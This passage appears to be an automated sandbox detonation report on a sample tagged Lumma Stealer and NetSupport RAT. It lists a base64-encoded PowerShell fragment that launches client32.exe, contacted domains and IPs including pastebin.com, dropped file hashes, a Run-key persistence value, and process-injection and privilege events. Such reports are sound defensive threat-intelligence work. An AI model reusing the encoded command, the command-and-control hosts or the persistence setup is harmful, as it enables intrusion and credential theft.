QAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 45.61.158.86:80 45.61.158.86 tcp
US 8.8.8.8:53 availabkelk.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 sergei-esenin.com udp
US 104.21.53.8:443 sergei-esenin.com tcp

Files

memory/2904-0-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2736-6-0x0000000002920000-0x0000000002948000-memory.dmp

memory/2736-10-0x0000000002968000-0x0000000002970000-memory.dmp

memory/2736-13-0x0000000002970000-0x0000000002978000-memory.dmp

memory/2736-30-0x0000000002960000-0x0000000002968000-memory.dmp

memory/2736-29-0x00000000029C0000-0x00000000029C8000-memory.dmp

memory/2736-28-0x0000000002958000-0x0000000002960000-memory.dmp

memory/2736-27-0x00000000029B8000-0x00000000029C0000-memory.dmp

memory/2736-34-0x00000000029C8000-0x00000000029D0000-memory.dmp

memory/2736-36-0x00000000029D0000-0x00000000029D8000-memory.dmp

memory/2736-38-0x00000000029D8000-0x00000000029E0000-memory.dmp

memory/2736-40-0x00000000029E0000-0x00000000029E8000-memory.dmp

memory/2736-42-0x0000000000210000-0x0000000000211000-memory.dmp

memory/2736-43-0x00000000029E8000-0x00000000029F0000-memory.dmp

memory/2736-47-0x00000000029F0000-0x00000000029F8000-memory.dmp

memory/2736-46-0x0000000002920000-0x0000000002948000-memory.dmp

memory/2736-51-0x00000000029F8000-0x0000000002A00000-memory.dmp

memory/2736-50-0x0000000002968000-0x0000000002970000-memory.dmp

memory/2736-55-0x0000000002A00000-0x0000000002A08000-memory.dmp

memory/2736-54-0x0000000002970000-0x0000000002978000-memory.dmp

memory/2736-61-0x0000000002A08000-0x0000000002A10000-memory.dmp

memory/2736-60-0x00000000029C0000-0x00000000029C8000-memory.dmp

memory/2736-59-0x0000000002958000-0x0000000002960000-memory.dmp

memory/2736-58-0x00000000029B8000-0x00000000029C0000-memory.dmp

memory/2736-65-0x0000000002A10000-0x0000000002A18000-memory.dmp

memory/2736-68-0x0000000002A18000-0x0000000002A20000-memory.dmp

memory/2736-67-0x00000000029C8000-0x00000000029D0000-memory.dmp

memory/2736-72-0x0000000002A20000-0x0000000002A28000-memory.dmp

memory/2736-71-0x00000000029D0000-0x00000000029D8000-memory.dmp

memory/2736-77-0x00000000029D8000-0x00000000029E0000-memory.dmp

memory/2736-78-0x0000000002A28000-0x0000000002A30000-memory.dmp

memory/2736-83-0x0000000002A30000-0x0000000002A38000-memory.dmp

memory/2736-82-0x00000000029E0000-0x00000000029E8000-memory.dmp

memory/2736-87-0x0000000002A38000-0x0000000002A40000-memory.dmp

memory/2736-86-0x00000000029E8000-0x00000000029F0000-memory.dmp

memory/2736-91-0x0000000002A40000-0x0000000002A48000-memory.dmp

memory/2736-90-0x00000000029F0000-0x00000000029F8000-memory.dmp

memory/2736-95-0x0000000002A48000-0x0000000002A50000-memory.dmp

memory/2736-94-0x00000000029F8000-0x0000000002A00000-memory.dmp

memory/2736-98-0x0000000002A50000-0x0000000002A58000-memory.dmp

memory/2736-97-0x0000000002A00000-0x0000000002A08000-memory.dmp

memory/2736-112-0x0000000002A10000-0x0000000002A18000-memory.dmp

memory/2736-111-0x0000000000480000-0x000000000048A000-memory.dmp

memory/2736-110-0x0000000000480000-0x000000000048A000-memory.dmp

memory/2736-109-0x0000000000480000-0x000000000048A000-memory.dmp

memory/2736-108-0x0000000000480000-0x000000000048A000-memory.dmp

memory/2736-107-0x0000000002A08000-0x0000000002A10000-memory.dmp

memory/2736-115-0x0000000000210000-0x0000000000211000-memory.dmp

memory/2736-130-0x0000000000210000-0x0000000000211000-memory.dmp

memory/2736-146-0x0000000002A18000-0x0000000002A20000-memory.dmp

memory/2736-156-0x0000000002A20000-0x0000000002A28000-memory.dmp

memory/2736-159-0x0000000002A28000-0x0000000002A30000-memory.dmp

memory/2736-160-0x0000000002A30000-0x0000000002A38000-memory.dmp

memory/2736-161-0x0000000002A38000-0x0000000002A40000-memory.dmp

memory/2736-163-0x0000000002A40000-0x0000000002A48000-memory.dmp

memory/2736-164-0x0000000002A48000-0x0000000002A50000-memory.dmp

memory/2736-165-0x0000000002A50000-0x0000000002A58000-memory.dmp

memory/2736-168-0x0000000000480000-0x000000000048A000-memory.dmp

memory/2736-169-0x0000000000480000-0x000000000048A000-memory.dmp

memory/2736-170-0x0000000000480000-0x000000000048A000-memory.dmp

memory/2736-171-0x0000000000480000-0x000000000048A000-memory.dmp

\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe

MD5 e634616d3b445fc1cd55ee79cf5326ea
SHA1 ca27a368d87bc776884322ca996f3b24e20645f4
SHA256 1fcd04fe1a3d519c7d585216b414cd947d16997d77d81a2892821f588c630937
SHA512 7d491c0a97ce60e22238a1a3530f45fbb3c82377b400d7986db09eccad05c9c22fb5daa2b4781882f870ab088326e5f6156613124caa67b54601cbad8f66aa90

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\libvlc.dll

MD5 4b262612db64f26ea1168ca569811110
SHA1 8e59964d1302a3109513cd4fd22c1f313e79654c
SHA256 a9340c99206f3388153d85df4ca94d33b28c60879406cc10ff1fd10eae16523f
SHA512 9902e64eb1e5ed4c67f4b7e523b41bde4535148c6be20db5f386a1da74533ca575383f1b3154f5985e379df9e1e164b6bda25a66504edcfaa57d40b04fc658c7

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\libvlccore.dll

MD5 5bdff9dac8efdfedd169125e415a4111
SHA1 51bca77b201aa86b53735290c91bf4180cefe28e
SHA256 d5d609ce70c0459e07b7347f4a25d01e1526795d4c324034d4bbc9ac05d06ecd
SHA512 12aabb6ac23ea73d9625a3f61777f034951f333a30e17167d61c5a65d10acd2a83f392680d894ca941d20c84626f3257f3227c5f7f81c6d529b53edb0d8e4575

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\ulgbkv

MD5 8f37e80238556701210f07b7bbf91106
SHA1 b4593b7bd699bf461a568898e6b04f071476c8dd
SHA256 25a885ccdf9d1f231ef15d4abbf322513cd90ffa0699b553a64e73b0b70ca9e6
SHA512 df80ffa4625c7a35de4f577275c3794eca961cbd5ef0bd955a4a0cf662f783832ad6bc4496e8ebeb844d306d64dd0cf00f197ab419f9120bcfe804204b5be73e

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\bmrrr

MD5 d78f6cce7dd76163e1af90c2287b7a04
SHA1 166e4715075b449fd6b9cde5ee06b66a2df050d2
SHA256 e48fe2b9bbffe143e8d9bf7f5559469de7edfc4b1a2185980379f3a74510e6e1
SHA512 741ea7ae677185b41b0a8fc05dfe250a09d3f90856e073b7713110509cec8bd0764e7333e4bf8527edd2dea8c006a00ffd8b9b53b41db169ac546eed19dad82f

memory/1516-206-0x000007FEF5F40000-0x000007FEF6098000-memory.dmp

memory/1516-217-0x0000000140000000-0x00000001402B5000-memory.dmp

memory/1516-216-0x000007FEF6710000-0x000007FEF6744000-memory.dmp

memory/1516-215-0x000000013F700000-0x000000013F7F8000-memory.dmp

memory/2396-225-0x000007FEF65B0000-0x000007FEF6708000-memory.dmp

memory/2736-226-0x0000000000210000-0x0000000000211000-memory.dmp

memory/2736-229-0x0000000000210000-0x0000000000211000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 1eb710ce39c51cd352a901e3ce4d69da
SHA1 d8007d7f26418f51d8661ddd40880f55ede84b4f
SHA256 ca2753118c41e5d15d73f599354f159c365dec1dfd5f87486f0099f76acd515b
SHA512 43bd805a025fb03fc497a1484afb88020b2b7d0312ae52d002472586226edd674764afa189fb8f079c289cd3daed3fd626fb8a11c03dc70b781b620bd0bf8ffb

C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf

MD5 acfffe6de49ab6bbcb590e95d558111b
SHA1 51d7b4a4ef2851f4787805bd2eebc61f9f62ae34
SHA256 fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217
SHA512 94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e

memory/2736-258-0x0000000002A50000-0x0000000002A58000-memory.dmp

memory/2736-257-0x0000000002A48000-0x0000000002A50000-memory.dmp

memory/2736-256-0x0000000002A40000-0x0000000002A48000-memory.dmp

memory/2736-255-0x0000000002A38000-0x0000000002A40000-memory.dmp

memory/2736-254-0x0000000002A30000-0x0000000002A38000-memory.dmp

memory/2736-253-0x0000000002A28000-0x0000000002A30000-memory.dmp

memory/2736-252-0x0000000002A20000-0x0000000002A28000-memory.dmp

memory/2736-251-0x0000000002A18000-0x0000000002A20000-memory.dmp

memory/2736-250-0x0000000002A10000-0x0000000002A18000-memory.dmp

memory/2736-249-0x0000000002A08000-0x0000000002A10000-memory.dmp

memory/2736-248-0x0000000002A00000-0x0000000002A08000-memory.dmp

memory/2736-247-0x00000000029F8000-0x0000000002A00000-memory.dmp

memory/2736-246-0x00000000029F0000-0x00000000029F8000-memory.dmp

memory/2736-245-0x00000000029E8000-0x00000000029F0000-memory.dmp

memory/2736-244-0x00000000029E0000-0x00000000029E8000-memory.dmp

memory/2736-243-0x00000000029D8000-0x00000000029E0000-memory.dmp

memory/2736-242-0x00000000029D0000-0x00000000029D8000-memory.dmp

memory/2736-241-0x00000000029C8000-0x00000000029D0000-memory.dmp

memory/2736-240-0x00000000029C0000-0x00000000029C8000-memory.dmp

memory/2736-239-0x0000000002958000-0x0000000002960000-memory.dmp

memory/2736-238-0x00000000029B8000-0x00000000029C0000-memory.dmp

memory/2736-237-0x0000000002970000-0x0000000002978000-memory.dmp

memory/2736-236-0x0000000002968000-0x0000000002970000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 8758081539cb84f9ae2ab4d49dbcece2
SHA1 b5062da4d554a96f8553e2f364c8e2cac487cdc3
SHA256 95edccefdb29c534ec6ec58a31ef5f24cb8107dffe9a80839b51c3ad385bc8f7
SHA512 bba169e7aea9a80efd2a2a6e0c3ee125db77bd1346f2d00b966fd63cb91c0981ddf137ed3d6dbb810072dee1f5cfb2c6f2084b61af3b641a6027abcab234d97e

memory/2396-274-0x000007FEF65B0000-0x000007FEF6708000-memory.dmp

memory/2396-276-0x000000013FB60000-0x000000013FC58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7e12ea90

MD5 23fd6cadeacff092eacd4046d11d34d1
SHA1 10cfd220d342b555b5ced1f6211b30d00dc603a7
SHA256 6a841014e97453623af056b8e1a0a5905a5450875de973cc4fc796ec90d4e375
SHA512 24b2995ba5d26aa1f7a1d3d7a543d3435a8d536d7c6305b977c98acdcb5933aefb2606b145167f65e01452bea34b8d22d78459b80b90840bdf50e3cefcaf6d8e

memory/2396-278-0x0000000140000000-0x00000001402B5000-memory.dmp

memory/2184-281-0x0000000076F20000-0x00000000770C9000-memory.dmp

memory/2184-282-0x0000000074110000-0x0000000074284000-memory.dmp

memory/1940-284-0x0000000076F20000-0x00000000770C9000-memory.dmp

memory/1940-285-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1940-286-0x0000000000400000-0x0000000000465000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab51DA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar520B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\install.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

NetSupport

rat netsupport

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TempControll = "C:\\Users\\Admin\\AppData\\Roaming\\TempControll\\client32.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4528 set thread context of 3624 N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe C:\Windows\SysWOW64\cmd.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1292 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 1292 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
